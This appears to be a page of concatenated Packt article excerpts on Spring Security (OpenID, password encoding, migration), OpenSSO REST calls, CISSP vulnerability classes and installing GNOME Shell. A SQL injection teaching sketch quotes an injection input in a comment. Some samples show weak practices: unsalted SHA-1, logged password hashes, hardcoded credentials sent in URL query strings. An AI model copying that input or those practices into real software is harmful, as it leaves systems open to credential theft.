- myOpenID
- Google
Enabling OpenID authentication with Spring Security
Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project (http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality.
Writing an OpenID login form
It's typically the case that a site presents both standard (username and password) and OpenID login options on a single login page, allowing the user to select one or the other, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows:

<h1>Or, Log Into Your Account with OpenID</h1>
<p>
Please use the form below to log into your account with OpenID.
</p>
<form action="j_spring_openid_security_check" method="post">
<label for="openid_identifier">Login</label>:
<input id="openid_identifier" name="openid_identifier" size="20" maxlength="100" type="text"/>
<img src="images/openid.png" alt="OpenID"/>
<br />
<input type="submit" value="Login"/>
</form>

The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have semantic knowledge of the function of this field. There are even browser plug-ins, such as Verisign's OpenID SeatBelt (https://pip.verisignlabs.com/seatbelt.do), which take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page. You'll note that we don't offer the remember me option with OpenID login. This is because the redirection to and from the vendor causes the remember me checkbox value to be lost, so that when the user is successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but it ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login.
Configuring OpenID support in Spring Security
Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:

<http auto-config="true" ...>
<!-- Omitting content... -->
<openid-login/>
</http>

After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won't have any roles assigned to them. We'll take care of this next.
Adding OpenID users
As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account (that we'll be testing) into the database, by adding it to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment).
If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows:

insert into users(username, password, enabled, salt) values
('https://jamesgosling.myopenid.com/','unused',true,CAST(RAND()*1000000000 AS varchar));
insert into group_members(group_id, username) select id,'https://jamesgosling.myopenid.com/'
from groups where group_name='Administrators';

You'll note that this is similar to the other data that we inserted for our traditional username-and-password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require our site to store a password on behalf of the user! The observant reader will note, however, that this does not allow a user to create an arbitrary username and password and associate them with an OpenID; we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of this technology. At this point, you should be able to complete a full login using OpenID, following the sequence of redirects out to the provider and back. We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.

Encode your password with Spring Security 3

Packt
24 May 2010
6 min read
This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will:
- Examine different methods of configuring password encoding
- Understand the password salting technique for providing additional security to stored passwords
(For more resources on Spring, see here.)
In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way that makes it impractically difficult for malicious users to compromise them. The following general rules should be applied to passwords stored in a database:
- Passwords must not be stored in cleartext (plain text)
- Passwords supplied by the user must be compared to the recorded passwords in the database
- A user's password should not be supplied to the user upon demand (even if the user forgets it)
For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords, as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users, with the added bonus that, once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user with the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system.
Storing other types of sensitive information
Many of the guidelines that apply to the storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).
You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, and most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load and encrypt all the passwords in the database. For password encryption to work properly, two actors must use password encryption in synchronization, ensuring that passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface.
Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows:

<authentication-manager alias="authenticationManager">
    <authentication-provider user-service-ref="jdbcUserService">
        <password-encoder hash="sha"/>
    </authentication-provider>
</authentication-manager>

You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable to different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following list describes the out-of-the-box implementation classes and their benefits; note that all implementations reside in the o.s.s.authentication.encoding package.
- PlaintextPasswordEncoder (hash value: plaintext): encodes the password as plain text. This is the default password encoder for DaoAuthenticationProvider.
- Md4PasswordEncoder (hash value: md4): utilizes the MD4 hash algorithm. MD4 is not a secure algorithm; use of this encoder is not recommended.
- Md5PasswordEncoder (hash value: md5): utilizes the MD5 one-way encoding algorithm.
- ShaPasswordEncoder (hash values: sha, sha-256): utilizes the SHA one-way encoding algorithm and supports configurable levels of encoding strength.
- LdapShaPasswordEncoder (hash values: {sha}, {ssha}): an implementation of the LDAP SHA and LDAP SSHA algorithms, used in integration with LDAP authentication stores.
As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application.
Configuring password encoding
Configuring basic password encoding involves two pieces: encoding the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder.
Configuring the PasswordEncoder
First, we'll declare an instance of a PasswordEncoder as a normal Spring bean:

<bean class="org.springframework.security.authentication.encoding.ShaPasswordEncoder" id="passwordEncoder"/>

You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encoding algorithm, commonly used for password storage.
Configuring the AuthenticationProvider
We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step:

<authentication-manager alias="authenticationManager">
    <authentication-provider user-service-ref="jdbcUserService">
        <password-encoder ref="passwordEncoder"/>
    </authentication-provider>
</authentication-manager>

Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groups-data.sql script) are not stored in an encrypted form that matches the password encoder.
We'll need to post-process the bootstrap data with some simple Java code.
Writing the database bootstrap password encoder
The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security.DatabasePasswordSecurerBean, is fairly simple:

public class DatabasePasswordSecurerBean extends JdbcDaoSupport {

    @Autowired
    private PasswordEncoder passwordEncoder;

    public void secureDatabase() {
        getJdbcTemplate().query("select username, password from users",
            new RowCallbackHandler() {
                @Override
                public void processRow(ResultSet rs) throws SQLException {
                    String username = rs.getString(1);
                    String password = rs.getString(2);
                    String encodedPassword = passwordEncoder.encodePassword(password, null);
                    getJdbcTemplate().update(
                        "update users set password = ? where username = ?",
                        encodedPassword, username);
                    logger.debug("Updating password for username: "
                        + username + " to: " + encodedPassword);
                }
            });
    }
}

The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode each password using the injected PasswordEncoder reference. Each password is updated individually.
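The article opened by mentioning password salting, yet the bean above passes null as the salt. The following minimal sketch shows how a per-user salt could be supplied instead; the ShaPasswordEncoder methods are the real Spring Security 3 API, but the salt value and its handling here are assumptions for illustration:

import org.springframework.security.authentication.encoding.ShaPasswordEncoder;

public class SaltedEncodingDemo {
    public static void main(String[] args) {
        ShaPasswordEncoder encoder = new ShaPasswordEncoder(); // SHA-1 by default
        String salt = "per-user-random-value"; // hypothetical value, e.g. from a salt column
        String encoded = encoder.encodePassword("secret", salt);
        // the same salt must be supplied again when validating a login attempt
        boolean valid = encoder.isPasswordValid(encoded, "secret", salt);
        System.out.println(encoded + " valid=" + valid);
    }
}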

Migration to Spring Security 3

Packt
21 May 2010
5 min read
(For more resources on Spring, see here.)
During the course of this article we will:
- Review important enhancements in Spring Security 3
- Understand the configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3
- Illustrate the overall movement of important classes and packages in Spring Security 3
Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3.
Migrating from Spring Security 2
You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of these concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3, both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes; these will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable). A very important migration note: Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security itself!
Enhancements in Spring Security 3
Significant enhancements in Spring Security 3 over Spring Security 2 include the following:
- The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications (a brief configuration sketch appears below).
- Additional fine-grained configuration around authentication and access successes and failures.
- Enhanced capabilities of method access declaration, including annotation-based pre- and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior.
- Fine-grained management of session access and concurrency control using the security namespace.
- Noteworthy revisions to the ACL module, with the removal of the legacy ACL code in o.s.s.acl, and fixes for some important issues in the ACL framework.
- Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID.
- New Kerberos and SAML single sign-on support through the Spring Security Extensions project.
Other more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage make much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection. If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article.
Changes to configuration in Spring Security 3
Many of the changes in Spring Security 3 are visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3.
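As a purely illustrative sketch of the SpEL enhancement mentioned above (the URL pattern, role name, and IP range are placeholder values, not examples from the book), an expression-based access declaration can combine role checks with other conditions in a single rule:

<http use-expressions="true">
    <!-- SpEL lets one rule combine a role check with a network restriction -->
    <intercept-url pattern="/admin/**"
        access="hasRole('ROLE_ADMIN') and hasIpAddress('192.168.1.0/24')"/>
</http>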
Rearranged AuthenticationManager configuration The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected—declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all. <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /></authentication-provider> In Spring Security 2 to declare the <authentication-manager> element as a sibling of any AuthenticationProvider. <authentication-manager alias="authManager"/><authentication-provider> <jdbc-user-service data-source-ref="dataSource"/></authentication-provider><ldap-authentication-provider server-ref="ldap://localhost:10389/"/> In Spring Security 3, all AuthenticationProvider elements must be the children of <authentication-manager> element, so this would be rewritten as follows: <authentication-manager alias="authManager"> <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /> </authentication-provider> <ldap-authentication-provider server-ref= "ldap://localhost:10389/"/></authentication-manager> Of course, this means that the <authentication-manager> element is now required in any security namespace configurations. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition. <bean id="signedRequestAuthenticationProvider" class="com.packtpub.springsecurity.security .SignedUsernamePasswordAuthenticationProvider"> <security:custom-authentication-provider/> <property name="userDetailsService" ref="userDetailsService"/><!-- ... --></bean> While moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider ref= "signedRequestAuthenticationProvider"/></authentication-manager> Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3—look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping. New configuration syntax for session management options In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows: <http ... session-fixation-protection="none"><!-- ... 
New configuration syntax for session management options

In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing the URLs and classes involved in session and concurrency control management. If your older application configured session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows:

<http ... session-fixation-protection="none">
  <!-- ... -->
  <concurrent-session-control
      exception-if-maximum-exceeded="true" max-sessions="1"/>
</http>

The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element and consolidates it as follows:

<http ...>
  <session-management session-fixation-protection="none">
    <concurrency-control error-if-maximum-exceeded="true" max-sessions="1"/>
  </session-management>
</http>

You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Securing our Applications using OpenSSO in GlassFish Security
An example of such a system is the integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hands. All of these systems access some parts of the data, which flow into the other software so each can perform its job efficiently. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example can be a travel portal, whose clients need to communicate with many other systems to plan their traveling.

Integration between an in-house system and external partners can happen at different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible, and the need for some kind of integration mechanism becomes ever more pressing. SSO as a concept, and OpenSSO as a product, address this need to integrate systems' security together.

OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and auditing. These interfaces include the Client SDK for different programming languages, along with the following standards:

Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO)
XML Access Control Markup Language (XACML) for authorization functions
Service Provisioning Markup Language (SPML) for identity management functions

Using the client SDKs and the standards mentioned above is suitable when we are developing custom solutions or integrating our system with partners that already use them in their security infrastructure. For any other scenario these methods are overkill for developers. To make it easier for developers to interact with the OpenSSO core services, the Identity Web Services (IWS) are provided. We discussed IWS briefly in the OpenSSO functionalities section. The IWS are included in OpenSSO to perform the following tasks:

Authentication and single sign-on: verifying the user credentials or their authentication token
Authorization: checking the authenticated user's permissions for accessing a resource
Provisioning: creating, deleting, searching, and editing users
Logging: the ability to audit and record operations

IWS are exposed in two models: the first is the WS-* compliant, SOAP-based Web Services, and the second is a very simple but elegant set of RESTful services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use the RESTful interface to perform authentication, authorization, and SSO.

Authenticating users by the RESTful interface

Performing authentication using the RESTful Web Services interface is very simple, as it is just like plain HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters, and the output is what we can expect from that operation.
The URL for the authentication operation, along with its parameters, is as follows:

Operation: Authentication
Operation URL: http://host:port/OpenSSOContext/identity/authenticate
Parameters: username, password, uri
Output: subjectid

The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext, which are things we already know. After the context we have the path to the RESTful service we want to invoke. The path includes the task type, which can be one of the tasks included in the IWS task list above, and the operation we want to invoke.

All parameters are self-descriptive except uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource which the user has requested.

In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation, such as authorization, logout, and so on. If you remember session IDs from your web development experience, subjectid is the same thing as a session ID. You can view all sessions, along with related information, from the OpenSSO administration console homepage under the Sessions tab.

The following listing shows a sample JSP page which performs a RESTful call to OpenSSO to authenticate a user and obtain a session ID for the user if they are authenticated.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authenticate";
    String username = "james";
    String password = "james";
    username = java.net.URLEncoder.encode(username, "UTF-8");
    password = java.net.URLEncoder.encode(password, "UTF-8");
    String operationString = operationURL + "?username=" + username +
        "&password=" + password;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>Subject ID</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>

REST makes straightforward tasks easier than ever. Without REST we would have to deal with the complexity of SOAP, WSDL, and so on, but with REST you can understand the whole listing on a first scan. Beginning from the top, we define the REST operation URL, which is assembled by taking the operation URL and appending the required parameters as name and value pairs. The URL that we connect to will be something like:

http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james

After assembling the URL we open a connection to it to invoke the authentication operation. After opening the connection we can check whether we received an HTTP_OK response from the server. Receiving HTTP_OK means that the authentication was successful and we can read the subjectid from the response. The connection may result in other response codes, such as HTTP_UNAUTHORIZED (HTTP error code 401), when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html.
Authorizing using REST

If you remember, in the Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police the http://gfbook.pcname.com:8080/ URL for us, and later on we applied the policy rule to a group of users that we created; now we want to check and see how our policy works. In every security system, before any authorization process, an authentication process must complete with a positive result. In our case the result of the authentication is the subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not.

The URL for the authorization operation, along with its parameters, is as follows:

Operation: Authorization
Operation URL: http://host:port/OpenSSOContext/identity/authorize
Parameters: uri, action, subjectid
Output: true or false, based on the permission of the subject over the entity and the given action

The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, for permission to perform the specified action on the resource identified by the uri. The output of the service invocation is either true or false.

The following listing shows how we can check whether an authenticated user has access to a certain resource. In the sample code we are checking james, identified by the subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authorize";
    String protectedUrl = "http://127.0.0.1:38080/Conversion-war/";
    String subjectId =
        "AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";
    String action = "POST";
    protectedUrl = java.net.URLEncoder.encode(protectedUrl, "UTF-8");
    subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");
    String operationString = operationURL + "?uri=" + protectedUrl +
        "&action=" + action + "&subjectid=" + subjectId;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>Authorization Result</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>

For this listing everything is the same as the authentication process in terms of initializing objects and calling methods, except that at the beginning we define the protected URL string and then include the subjectid, which is the result of our previous authentication. Later on we define the action whose permission we need to check for our authenticated user, and finally we read the result of the authorization. The complete operation URL, after including all parameters, is similar to the following snippet:

http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId

Note that no two subjectid values are ever the same, even for the same user on the same machine and the same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and substitute the subjectid resulting from your authentication for the one specified previously.
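Although this article stops at authorization, the same RESTful pattern can be applied to end a session. The sketch below assumes OpenSSO's identity/logout operation, which accepts the subjectid of the session to be invalidated; the host, context, and token value simply mirror the earlier examples, so substitute your own values before running it.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/logout";
    // The subjectid obtained from a previous authenticate call.
    String subjectId =
        "AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";
    subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");
    java.net.URL operation =
        new java.net.URL(operationURL + "?subjectid=" + subjectId);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) operation.openConnection();
    // HTTP_OK indicates the token was accepted and the session invalidated.
    if (connection.getResponseCode() ==
            java.net.HttpURLConnection.HTTP_OK) {
        out.println("<h2>Logout succeeded</h2>");
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>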
CISSP: Vulnerability and Penetration Testing for Access Control
IT components such as operating systems, application software, and even networks have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility of penetration into the systems, which may result in unauthorized access and a compromise of the confidentiality, integrity, and availability of information assets.

Vulnerability tests are performed to identify vulnerabilities, while penetration tests are conducted to check the following:

The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained
Whether the systems can be shut down or overloaded with malicious data, using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied

Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation.

Vulnerability assessment

Vulnerability assessment is a process in which IT systems, such as computers and networks, and software, such as operating systems and application software, are scanned in order to identify the presence of known and unknown vulnerabilities.

Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as a variable or constant are not properly defined or checked. It can be exploited by supplying more data than the entity can hold. This results in a memory spill-over into other areas, thereby corrupting the instructions or code to be processed by the microprocessor.

When a vulnerability is exploited it results in a security violation, which will have a certain impact. A security violation may be an unauthorized access, an escalation of privileges, or a denial-of-service against the IT systems.

Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be hardware-based or a software application.

Generally, vulnerabilities can be classified based on the type of security error, a type being the root cause of the vulnerability. Vulnerabilities can be classified into the following types:

Access Control Vulnerabilities

An error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource.

Examples: improper or no access control list or table; no privilege model; inadequate file permissions; improper or weak encoding

Security violation and impact: files, objects, or processes can be accessed directly without authentication or routing.

Authentication Vulnerabilities

An error due to inadequate identification mechanisms, so that a user or a process is not correctly identified.

Examples: weak or static passwords; improper or weak encoding, or weak algorithms

Security violation and impact: an unauthorized or less privileged user (for example, a Guest user), or a less privileged process, gains higher privileges, such as administrative or root access to the system.

Boundary Condition Vulnerabilities

An error due to inadequate checking and validating mechanisms, such that the length of data is not checked or validated against the size of the data storage or resource.

Examples: buffer overflow; overwriting the original data in memory

Security violation and impact: memory is overwritten with some arbitrary code so that the attacker gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system resulting from memory corruption may be exploited to get command prompt or shell access by injecting arbitrary code.

Configuration Weakness Vulnerabilities

An error due to improper configuration of system parameters, or leaving the default configuration settings as they are, which may not be secure.

Examples: default security policy configuration; file and print access in Internet connection sharing

Security violation and impact: most of the default configuration settings of many software applications are published and available in the public domain. For example, some applications ship with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges, resulting in privilege escalation.

Exception Handling Vulnerabilities

An error due to improper setup or coding, where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions.

Example: SQL injection (a short sketch follows at the end of this article section)

Security violation and impact: by injecting exceptional data, user credentials can be captured by an unauthorized entity.

Input Validation Vulnerabilities

An error due to a lack of verification mechanisms to validate the input data or contents.

Examples: directory traversal; malformed URLs

Security violation and impact: due to poor input validation, access to system-privileged programs may be obtained.

Randomization Vulnerabilities

An error due to a mismatch in, or weakness of, the random data used by the process. These vulnerabilities predominantly relate to encryption algorithms.

Examples: weak encryption key; insufficient random data

Security violation and impact: a cryptographic key can be compromised, which will impact data and access security.

Resource Vulnerabilities

An error due to a lack of resource availability for correct operations or processes.

Examples: memory getting full; CPU completely utilized

Security violation and impact: due to the lack of resources the system becomes unstable or hangs. This results in a denial of service to legitimate users.

State Errors

An error resulting from a lack of state maintenance due to incorrect process flows.

Example: opening multiple tabs in web browsers

Security violation and impact: specific security attacks, such as cross-site scripting (XSS), can result in user-authenticated sessions being hijacked.

Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost-effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
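To make the SQL injection example concrete, the sketch below contrasts a query built by string concatenation with a parameterized alternative. The table and column names are hypothetical; the JDBC calls are standard java.sql APIs.

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class LoginCheck {

    // VULNERABLE: user input is concatenated into the SQL text, so an input
    // such as ' OR '1'='1 turns the WHERE clause into a tautology and
    // bypasses the password check entirely.
    public boolean loginUnsafe(Connection conn, String user, String pass)
            throws SQLException {
        Statement stmt = conn.createStatement();
        ResultSet rs = stmt.executeQuery(
            "SELECT 1 FROM users WHERE name = '" + user +
            "' AND password = '" + pass + "'");
        return rs.next();
    }

    // SAFER: a PreparedStatement transmits the values as parameters, so they
    // can never be re-interpreted as SQL keywords or operators.
    public boolean loginSafe(Connection conn, String user, String pass)
            throws SQLException {
        PreparedStatement ps = conn.prepareStatement(
            "SELECT 1 FROM users WHERE name = ? AND password = ?");
        ps.setString(1, user);
        ps.setString(2, pass);
        return ps.executeQuery().next();
    }
}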
Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"
Remember, these are development builds and preview snapshots, and they are still in the early stages. While GNOME Shell appears to be functional (so far), your mileage may vary.

Installing GNOME-Shell

With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot, so you are not running the latest and greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds.

I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox.

Package Installation

If you'd prefer to install the package and just take a sneak peek at the snapshot, simply run the command below in your terminal:

sudo aptitude install gnome-shell

Manual Compilation

Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems, keep in mind that installing GNOME Shell this way does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues on the GnomeShell wiki page.

There is one package that you'll need in order to compile GNOME Shell, called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven't noticed any problems in doing so. To install jhbuild from the 9.04 repository, use the instructions below:

Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download
Select a mirror close to you
Download and install the .deb package. I don't believe there are any additional dependencies needed for this package.

After that package is installed you'll want to download the GNOME Shell build setup script, which makes this entire process much, much simpler:

cd ~
wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh

This script will handle finding and installing dependencies as well as compiling the builds. To launch the script, run the command:

bash gnome-shell-build-setup.sh

You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it reports no more warnings.

Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0GHz Dell laptop. My build was completely automated but, considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command:

jhbuild build

Ready To Launch

Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below; take note of the method that matches how you installed. Also, note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearance and disable it under the Desktop Effects tab.

Package Installation

Launch it with:

gnome-shell --replace

Manual Compilation

Launch it as follows:

~/gnome-shell/source/gnome-shell/src/gnome-shell --replace